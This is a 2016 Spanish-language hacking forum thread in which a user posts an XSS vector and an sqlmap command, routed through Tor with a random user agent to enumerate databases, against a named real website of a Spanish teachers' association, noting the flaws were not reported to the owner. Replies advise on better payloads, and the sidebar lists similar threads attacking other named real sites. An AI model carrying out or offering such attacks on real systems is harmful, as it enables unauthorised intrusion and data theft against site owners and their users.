comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SQLi , XSS] www.fepal.net

  • 3 Respuestas
  • 1345 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil
« en: Marzo 05, 2016, 09:37:52 pm »
Hola !!!
Bienvenido a mi post

RREEDD
Sitio :http://www.fepal.net

Descripción del sitio:  Federación Española de Asociación de Profesores de Audición y Lenguaje.

Lista de Vulnerabilidades.
  • [XSS] Inyección en URL .
       
        Url del sitio :http://www.fepal.net/noticias.php?id=1
        Vector : <h1>underc0de</h1>
        xploit : No tienes permisos para ver links. Registrate o Entra con tu cuenta<h1>underc0de</h1>&pg=1
        Reportado: NO
        Autor: RREEDD
  • [SQLi] Inyección en URL.
       
        Url del sitio :http://www.fepal.net/noticias.php?id=1
        Inyeccion :  sqlmap.py -u "No tienes permisos para ver links. Registrate o Entra con tu cuenta" -p "id"  --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --time-sec 15
        Herramienta : SQLMAP
        Reportado: NO
        Autor: RREEDD
Saludos desde Chile
« Última modificación: Marzo 06, 2016, 08:28:17 am por EPSILON »

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #1 en: Marzo 06, 2016, 08:50:58 am »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

Conectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #2 en: Marzo 06, 2016, 10:35:16 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
@No tienes permisos para ver links. Registrate o Entra con tu cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

Además de eso, cuando buscas una XSS tienes que buscar ejecutar código javascript, en muchas ocasiones te permite poner una etiqueta html, pero no se puede llegar a ejecutar un código javascript.

Éste Payload estaría mejor: "No tienes permisos para ver links. Registrate o Entra con tu cuenta"

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil
« Respuesta #3 en: Marzo 06, 2016, 12:05:45 pm »
RREEDDHola!!
No tienes permisos para ver links. Registrate o Entra con tu cuenta
@No tienes permisos para ver links. Registrate o Entra con tu cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.
Gracias por la aclaración, porque mi intención al poner el payload de sqlmap era demostrar que era vulnerable, así que lo tendre en mente para la próxima.

Muchas gracias a todos por comentar.

Saludos desde Chile.

 

¿Te gustó el post? COMPARTILO!



[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 853
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 2167
Último mensaje Junio 02, 2017, 06:39:33 am
por baah
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1136
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1089
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1240
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos